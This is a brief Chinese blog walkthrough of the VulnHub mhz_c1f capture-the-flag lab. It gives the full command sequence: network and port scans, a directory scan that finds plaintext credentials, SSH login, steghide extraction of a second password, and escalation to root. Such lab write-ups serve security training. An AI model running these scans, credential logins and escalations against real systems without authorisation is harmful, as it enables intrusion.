今天實踐的是vulnhub的mhz_c1f鏡像,
下載地址,https://download.vulnhub.com/mhzcxf/mhz_c1f.ova.zip,
無法用workstation導入,用virtualbox導入成功,
做地址掃描,sudo netdiscover -r 192.168.0.0/24,
獲取到靶機地址192.168.0.186,

繼續進行端口掃描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.186,

有web服務,進行txt文件掃描,dirb http://192.168.0.186 -X .txt,

獲取到http://192.168.0.186/notes.txt,瀏覽器訪問,

獲取到remb.txt,瀏覽器訪問http://192.168.0.186/remb.txt,

獲取到用戶名密碼,first_stage/flagitifyoucan1234,
ssh登錄,ssh first_stage@192.168.0.186,查看到一些圖片,

把圖片拷貝到kali攻擊機,
scp first_stage@192.168.0.186:/home/mhz_c1f/Paintings/* .
解水印,steghide extract -sf 'spinning the wool.jpeg',

獲取到用戶名密碼,mhz_c1f:1@ec1f,
切用戶,su mhz_c1f,繼續切root,sudo su,沒問題,

本周的技術實踐到此結束,本周的技術實踐到此結束,本周的技術實踐到此結束,本周的技術實踐到此結束,本周的技術實踐到此結束,本周的技術實踐到此結束,本周的技術實踐到此結束,本周的技術實踐到此結束,本周的技術實踐到此結束,本周的技術實踐到此結束。
中國網絡空間安全協會
關鍵基礎設施安全應急響應中心
商密君
威努特工控安全
安全牛
安全客
車小胖談網絡
商密君
一顆小胡椒
云計算和網絡安全技術實踐
云計算和網絡安全技術實踐
一顆小胡椒